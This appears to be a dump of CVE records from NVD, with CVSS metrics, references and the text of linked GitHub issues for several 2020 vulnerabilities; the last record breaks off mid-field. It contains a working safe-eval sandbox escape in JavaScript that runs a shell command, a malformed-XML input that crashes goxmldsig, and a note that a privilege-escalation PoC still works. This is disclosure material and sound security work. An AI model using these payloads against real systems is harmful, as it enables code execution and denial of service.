"af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.gog.com/galaxy" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.positronsecurity.com/blog/2020-08-13-gog-galaxy_client-local-privilege-escalation_deuce/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gog:galaxy:*:*:*:*:*:windows:*:*", "matchCriteriaId": "5314B5BB-CE6A-4BD1-B9CE-ACA13D7A7349", "versionEndExcluding": null, "versionEndIncluding": "2.0.41", "versionStartExcluding": null, "versionStartIncluding": "2.0.13", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1#issuecomment-926932218
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jtesta", "gog_galaxy_client_service_poc" ]
....Just in case anyone was wondering, the PoC still works on GOG Galaxy 2.0.35 (last tested as of time of wriitng this). Just compiled and tested it and was able to create a local user and add them to the local administrators group on a testbed system. GOG has yet to fix the underlying issue, it seems. CVE-2020-24574 is alive and well, yet.
PoC status update
https://api.github.com/repos/jtesta/gog_galaxy_client_service_poc/issues/1/comments
17
2021-01-22T23:22:15Z
2025-01-20T03:14:04Z
https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1
792,366,903
1
1,393
CVE-2020-7710
2020-08-21T10:15:11.460
This affects all versions of package safe-eval. It is possible for an attacker to run an arbitrary command on the host machine.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hacksparrow/safe-eval/issues/19" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-SAFEEVAL-608076" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hacksparrow/safe-eval/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-SAFEEVAL-608076" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "40E74BFD-022E-4056-878F-0FA8BA26FDAB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/hacksparrow/safe-eval/issues/19
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hacksparrow", "safe-eval" ]
The following script can lead to safe-eval sandbox escape (node `v12.13.0`): ```javascript const safeEval = require('safe-eval'); const theFunction = function() { const bad = new Error(); bad.__proto__ = null; bad.stack = { match(outer) { throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString(); } }; return bad; }; const untrusted = `(${theFunction})()`; console.log(safeEval(untrusted)); ``` Inspired from @XmiliaH 's [vm2 escape](https://github.com/patriksimek/vm2/issues/241).
Sandbox Escape
https://api.github.com/repos/hacksparrow/safe-eval/issues/19/comments
1
2020-02-28T07:50:28Z
2020-08-03T05:42:15Z
https://github.com/hacksparrow/safe-eval/issues/19
572,587,043
19
1,394
CVE-2020-10290
2020-08-21T15:15:12.540
Universal Robots controller execute URCaps (zip files containing Java-powered applications) without any permission restrictions and a wide API that presents many primitives that can compromise the overall robot operations as demonstrated in our video. In our PoC we demonstrate how a malicious actor could 'cook' a custom URCap that when deployed by the user (intendedly or unintendedly) compromises the system
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/1495" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/1495" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:sintef:urx:-:*:*:*:*:*:*:*", "matchCriteriaId": "D90D07FA-3643-4EBD-A0B3-7A5915E5216B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "269" ]
269
https://github.com/aliasrobotics/RVD/issues/1495
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 1495 title: 'RVD#1495: Universal Robots URCaps execute with unbounded privileges' type: vulnerability description: Universal Robots controller execute URCaps (zip files containing Java-powered applications) without any permission restrictions and a wide API that presents many primitives that can compromise the overall robot operations as demonstrated in our video. In our PoC we demonstrate how a malicious actor could 'cook' a custom URCap that when deployed by the user (intendedly or unintendedly) compromises the system cwe: CWE-250 (Execution with Unnecessary Privileges) cve: CVE-2020-10290 keywords: - Universal Robots system: URx vendor: Universal Robots severity: rvss-score: 10.0 rvss-vector: RVSS:1.0/AV:PR/AC:L/PR:N/UI:N/Y:Z/S:U/C:H/I:H/A:H/H:H severity-description: critical cvss-score: 6.8 cvss-vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H links: - https://www.universal-robots.com/plus/ - https://github.com/aliasrobotics/RVD/issues/1495 flaw: phase: testing specificity: general issue architectural-location: platform code application: industrial robot manipulator subsystem: manipulation:actuation package: libc6 2.19-11 i386 languages: C date-detected: null detected-by: "Victor Mayoral Vilches and Unai Ayucar Carbajo (Alias Robotics)" detected-by-method: testing date-reported: '2020-04-03' reported-by: "Victor Mayoral Vilches, Unai Ayucar Carbajo" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/1495 reproducibility: always trace: N/A reproduction: Not available reproduction-image: Not available exploitation: description: Generate a crafted URCap that takes all the computational resources of the robot. exploitation-image: Not available exploitation-vector: Not available exploitation-recipe: '' mitigation: description: Sandbox and isolate URCaps to only the required components, interfaces, libraries and network connections pull-request: Not available date-mitigation: null ```
RVD#1495: Universal Robots URCaps execute with unbounded privileges
https://api.github.com/repos/aliasrobotics/RVD/issues/1495/comments
2
2020-04-03T15:49:12Z
2020-08-21T15:02:32Z
https://github.com/aliasrobotics/RVD/issues/1495
593,476,197
1,495
1,395
CVE-2020-7711
2020-08-23T14:15:09.573
This affects all versions of package github.com/russellhaering/goxmldsig. There is a crash on nil-pointer dereference caused by sending malformed XML signatures.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/russellhaering/goxmldsig/issues/48" }, { "source": "report@snyk.io", "tags": [ "Broken Link" ], "url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-608301" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/russellhaering/goxmldsig/issues/48" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-608301" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:goxmldsig_project:goxmldsig:*:*:*:*:*:*:*:*", "matchCriteriaId": "A6E25D60-FAC6-4DD2-9AF6-5034CAB84901", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/russellhaering/goxmldsig/issues/48
[ "Exploit", "Third Party Advisory" ]
github.com
[ "russellhaering", "goxmldsig" ]
See https://github.com/russellhaering/gosaml2/issues/59 for background. Program which exhibits the issue: ```go package main import ( "crypto/x509" "encoding/base64" "encoding/xml" "fmt" "time" saml2 "github.com/russellhaering/gosaml2" "github.com/russellhaering/gosaml2/types" dsig "github.com/russellhaering/goxmldsig" ) const ( timeString = "2019-08-12T12:00:52.718Z" oktaMetadata = `<?xml version="1.0" encoding="UTF-8"?><md:EntityDescriptor entityID="http://www.okta.com/exk133onomIuOW98z357" xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata"><md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"><md:KeyDescriptor use="signing"><ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:X509Data><ds:X509Certificate>MIIDpDCCAoygAwIBAgIGAWxzAwX1MA0GCSqGSIb3DQEBCwUAMIGSMQswCQYDVQQGEwJVUzETMBEG A1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzENMAsGA1UECgwET2t0YTEU MBIGA1UECwwLU1NPUHJvdmlkZXIxEzARBgNVBAMMCmRldi05MDUyNTExHDAaBgkqhkiG9w0BCQEW DWluZm9Ab2t0YS5jb20wHhcNMTkwODA4MjA1MzMzWhcNMjkwODA4MjA1NDMzWjCBkjELMAkGA1UE BhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xDTALBgNV BAoMBE9rdGExFDASBgNVBAsMC1NTT1Byb3ZpZGVyMRMwEQYDVQQDDApkZXYtOTA1MjUxMRwwGgYJ KoZIhvcNAQkBFg1pbmZvQG9rdGEuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA m+ZZF6aEG6ehLLIV6RPA+i1z6ss3HBG2bZD3efwKCDDXYUkp59AE7JsjVHMtpJPHhzHuScuHDMlu HmkBQTW7j9XpnaRn8SfZXkwlCUHTo+HAC9lwbQxO4d4wnwgnm6FAjm1I/gbfFAobd8BR9pDxHuXE MQ0DtQu/W3WbDUrz/bhSxPJAoVy2koQn9G0y3unm7eRwYWHeuW6GdPWV2szTtDS0c3qtUXVF5Ugg iQYlwQu6xkfy4l8iGJL7ETa2BmJzwCFecMIct87SqNhYQwCBH54MBaHcaSsCKyimNvMY9B7RmC+H 4+awePPA1q3R/UQ3Pfom8mx6yDdKIWqlkG3MsQIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQAiURCZ P4oJWcf1o5nm4yG15UH01g/S6Y4OUWMi6BFJy9fCrJ0h/2BZKi68SQ0uMAbdK6anxCzq3Rr5MSzW OWPQ1Zljn3LGPsiTFdFca/GVRen5IYQ7Dr2Mvhtm+QVscEY9TDjtETbTAHEVEjwXmB21wtdIhizv sQS7wz0A8LV+Atpbev45RiV6COmB6T6vJuFQ7ZsDZMSHZriTYiETTJvHBGd7PtbCxYNc6LRB2JDb wlekRhVEjR0UhnM+nn2sqqbv7tDEPs63lZSDXCnR1PhscHrEuQ04rHI3OL0gCULVQFvJrj85IAZF 1QQuGUK8ozfOyFpQWAJUW71INnF/SLWv</ds:X509Certificate></ds:X509Data></ds:KeyInfo></md:KeyDescriptor><md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat><md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress</md:NameIDFormat><md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Location="https://dev-905251.okta.com/app/medev905251_test_1/exk133onomIuOW98z357/sso/saml"/><md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://dev-905251.okta.com/app/medev905251_test_1/exk133onomIuOW98z357/sso/saml"/></md:IDPSSODescriptor></md:EntityDescriptor>` badInput = `<p ID="5"o=""t=""n=""xmlns:saml2p=""s=""><saml2 t=""l=""></l><s s=""><s><s I=""><s><s m=""></m></s><s></e></e></o><s></e><s><s><s></X></X></o></e><saml2p l=""></l><saml2:Assertion ID="id1684056077776386493060641"IssueInstant="2019-08-12T12:00:52.718Z"Version="2.0"xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"xmlns:xs="http://www.w3.org/2001/XMLSchema"><saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity"xmlns="">http://www.okta.com/exk133onomIuOW98z357</l><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/><ds:Reference URI="#id1684056077776386493060641"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><ec:InclusiveNamespaces PrefixList="xs"xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#"/></m></s><ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><ds:DigestValue>dC1cm0pLLjIWZC6G2Pmf0JogmqHztp9W1euXPd/TUHo=</e></e></o><ds></e><ds><ds><ds></X></X></o></e><saml2:Subject xmlns:=""><saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">steven.james.johnstone@gmail.com</l><saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml2:SubjectConfirmationData InResponseTo="_40a419f5-5c1c-43d0-5834-5caf268a5f01"NotOnOrAfter="2019-08-12T12:05:52.718Z"Recipient="https://127.0.0.1/login"/></l></l><saml2:Conditions NotBefore="2019-08-12T11:55:52.718Z"NotOnOrAfter="2019-08-12T12:05:52.718Z"xmlns:=""><saml2:AudienceRestriction><saml2:Audience>37a8eec1ce19687d132fe29051dca629d164e2c4958ba141d5f4133a33f0688f.jazznetworks.com</l></l></l><saml2:AuthnStatement AuthnInstant="2019-08-12T12:00:52.718Z"SessionIndex="_40a419f5-5c1c-43d0-5834-5caf268a5f01"xmlns:=""><saml2:AuthnContext><saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</l></l></l><saml2:AttributeStatement xmlns:=""><saml2:Attribute Name="FirstName"NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"><saml2:AttributeValue xmlns:=""xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:type="xs:string">Steven</l></l><saml2:Attribute Name="LastName"NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"><saml2:AttributeValue xmlns:=""xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:type="xs:string">Johnstone</l></l><saml2:Attribute Name="Email"NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"><saml2:AttributeValue xmlns:=""xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:type="xs:string">steven.james.johnstone@gmail.com</l></l>` ) func newServiceProvider() *saml2.SAMLServiceProvider { metadata := &types.EntityDescriptor{} // may need to support EntityDescriptors (plural) if err := xml.Unmarshal([]byte(oktaMetadata), metadata); err != nil { panic(err) } certStore := dsig.MemoryX509CertificateStore{ Roots: []*x509.Certificate{}, } for _, kd := range metadata.IDPSSODescriptor.KeyDescriptors { for _, xcert := range kd.KeyInfo.X509Data.X509Certificates { if xcert.Data == "" { panic("nope") } certData, err := base64.StdEncoding.DecodeString(xcert.Data) if err != nil { panic(err) } idpCert, err := x509.ParseCertificate(certData) if err != nil { panic(err) } certStore.Roots = append(certStore.Roots, idpCert) } } SSOs := metadata.IDPSSODescriptor.SingleSignOnServices tenantURI := "test.example.com" fakeTime, err := time.Parse(time.RFC3339, timeString) if err != nil { panic(err) } clock := dsig.NewFakeClockAt(fakeTime) return &saml2.SAMLServiceProvider{ Clock: clock, IdentityProviderSSOURL: SSOs[0].Location, IdentityProviderIssuer: metadata.EntityID, ServiceProviderIssuer: tenantURI, AssertionConsumerServiceURL: "https://127.0.0.1/login", SignAuthnRequests: true, AudienceURI: tenantURI, IDPCertificateStore: &certStore, ValidateEncryptionCert: true, } } func main() { base64Input := base64.StdEncoding.EncodeToString([]byte(badInput)) if _, err := newServiceProvider().RetrieveAssertionInfo(base64Input); err != nil { fmt.Printf("error %v\n", err) } } ``` Panic: ``` panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x28 pc=0x66bca4] goroutine 1 [running]: github.com/russellhaering/goxmldsig.(*ValidationContext).validateSignature(0xc000154f88, 0xc00019c240, 0xc00019e4c0, 0xc000126580, 0x0, 0x1, 0x6010105) /goroot/go/src/github.com/russellhaering/goxmldsig/validate.go:275 +0x2b4 github.com/russellhaering/goxmldsig.(*ValidationContext).Validate(0xc000154f88, 0xc00017d560, 0xc00017d560, 0x0, 0x0) /goroot/go/src/github.com/russellhaering/goxmldsig/validate.go:466 +0xf3 github.com/russellhaering/gosaml2.(*SAMLServiceProvider).validateAssertionSignatures.func1(0xc000191080, 0xc0000ada40, 0x9, 0x1) /goroot/go/src/github.com/russellhaering/gosaml2/decode_response.go:178 +0x2fc github.com/russellhaering/goxmldsig/etreeutils.NSFindIterateCtx.func1(0xc000191080, 0xc0000ada40, 0xc000191080, 0x0) /goroot/go/src/github.com/russellhaering/goxmldsig/etreeutils/namespace.go:281 +0x137 github.com/russellhaering/goxmldsig/etreeutils.NSTraverse(0xc000190ba0, 0xc0000ada40, 0xc000190b70, 0x0, 0x0) /goroot/go/src/github.com/russellhaering/goxmldsig/etreeutils/namespace.go:148 +0x6e github.com/russellhaering/goxmldsig/etreeutils.NSTraverse(0xc0000ccc60, 0xc0000ad4a0, 0xc000190b70, 0x30, 0x6ebda0) /goroot/go/src/github.com/russellhaering/goxmldsig/etreeutils/namespace.go:155 +0xe5 github.com/russellhaering/goxmldsig/etreeutils.NSFindIterateCtx(0xc0000ccc60, 0xc0000ad4a0, 0x71c4d1, 0x25, 0x712a6e, 0x9, 0xc000190b40, 0x7152c8, 0x12) /goroot/go/src/github.com/russellhaering/goxmldsig/etreeutils/namespace.go:268 +0xa4 github.com/russellhaering/goxmldsig/etreeutils.NSFindIterate(...) /goroot/go/src/github.com/russellhaering/goxmldsig/etreeutils/namespace.go:257 github.com/russellhaering/gosaml2.(*SAMLServiceProvider).validateAssertionSignatures(0xc000164000, 0xc0000ad4a0, 0x0, 0x0) /goroot/go/src/github.com/russellhaering/gosaml2/decode_response.go:200 +0xed github.com/russellhaering/gosaml2.(*SAMLServiceProvider).ValidateEncodedResponse(0xc000164000, 0xc000143000, 0xe24, 0xc000013510, 0xc00015e000, 0xc0000d8b40) /goroot/go/src/github.com/russellhaering/gosaml2/decode_response.go:248 +0x30e github.com/russellhaering/gosaml2.(*SAMLServiceProvider).RetrieveAssertionInfo(0xc000164000, 0xc000143000, 0xe24, 0xa9b, 0xc000143000, 0xe24) /goroot/go/src/github.com/russellhaering/gosaml2/retrieve_assertion.go:40 +0x9b main.main() /goroot/go/src/github.com/russellhaering/gosaml2/crasher/main.go:93 +0xb6 exit status 2 ``` Potential fix: ```diff diff --git a/validate.go b/validate.go index 55feb39..fe63af4 100644 --- a/validate.go +++ b/validate.go @@ -271,6 +271,10 @@ func (ctx *ValidationContext) validateSignature(el *etree.Element, sig *types.Si return nil, errors.New("Signature could not be verified") } + if sig.SignatureValue == nil { + return nil, errors.New("nil signature value") + } + // Decode the 'SignatureValue' so we can compare against it decodedSignature, err := base64.StdEncoding.DecodeString(sig.SignatureValue.Data) if err != nil { ```
Crash on nil-pointer dereference with malformed input
https://api.github.com/repos/russellhaering/goxmldsig/issues/48/comments
10
2019-08-14T10:53:49Z
2021-08-28T03:19:01Z
https://github.com/russellhaering/goxmldsig/issues/48
480,612,498
48
1,396
CVE-2020-14043
2020-08-24T16:15:10.640
** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** A Cross Side Request Forgery (CSRF) vulnerability was found in Codiad v1.7.8 and later. The request to download a plugin from the marketplace is only available to admin users and it isn't CSRF protected in components/market/controller.php. This might cause admins to make a vulnerable request without them knowing and result in remote code execution. NOTE: the vendor states "Codiad is no longer under active maintenance by core contributors."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://advisory.checkmarx.net/advisory/CX-2020-4279" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Codiad/Codiad/blob/master/README.md" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Codiad/Codiad/issues/1122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://advisory.checkmarx.net/advisory/CX-2020-4279" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Codiad/Codiad/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Codiad/Codiad/issues/1122" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codiad:codiad:*:*:*:*:*:*:*:*", "matchCriteriaId": "43C9171C-2531-46A0-9952-70E476FB6A46", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.7.8", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/Codiad/Codiad/issues/1122
[ "Third Party Advisory" ]
github.com
[ "Codiad", "Codiad" ]
Hello, Our research team in Checkmarx found multiple vulnerabilities in Codiad (XSS, CSRF, SSRF, RCE), we tried to contact the top three maintainers and none of them are active. If there are any active developers on this project feel free to contact us for more information. ScaAppSec@checkmarx.com Best regards, Yaniv.
Multiple vulnerabilities that can result in RCE
https://api.github.com/repos/Codiad/Codiad/issues/1122/comments
1
2020-06-03T15:02:11Z
2020-08-25T06:11:19Z
https://github.com/Codiad/Codiad/issues/1122
630,072,524
1,122
1,397
CVE-2020-7376
2020-08-24T19:15:10.713
The Metasploit Framework module "post/osx/gather/enum_osx module" is affected by a relative path traversal vulnerability in the get_keychains method which can be exploited to write arbitrary files to arbitrary locations on the host filesystem when the module is run on a malicious host.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "cve@rapid7.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": 